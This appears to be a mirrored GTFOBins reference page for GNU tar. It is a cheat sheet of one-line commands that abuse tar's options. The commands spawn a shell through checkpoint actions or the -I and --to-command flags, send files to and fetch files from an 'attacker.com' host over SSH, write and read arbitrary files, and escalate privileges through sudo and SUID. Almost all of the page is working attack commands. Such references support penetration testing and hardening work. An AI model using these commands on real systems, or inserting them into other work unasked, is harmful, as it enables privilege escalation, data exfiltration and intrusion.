1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/tar.md
2020-06-10 23:04:59 +02:00

1.9 KiB

functions
shell file-upload file-download file-write file-read sudo limited-suid
code
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
description code
This only works for GNU tar. tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
description code
This only works for GNU tar. It can be useful when only a limited command argument injection is available. TF=$(mktemp) echo '/bin/sh 0<&1' > "$TF" tar cf "$TF.tar" "$TF" tar xf "$TF.tar" --to-command sh rm "$TF"*
description code
This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions). RHOST=attacker.com RUSER=root RFILE=/tmp/file_to_send.tar LFILE=file_to_send tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
description code
This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions). RHOST=attacker.com RUSER=root RFILE=/tmp/file_to_get.tar tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
description code
This only works for GNU tar. LFILE=file_to_write TF=$(mktemp) echo DATA > "$TF" tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
description code
This only works for GNU tar. LFILE=file_to_read tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
code
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh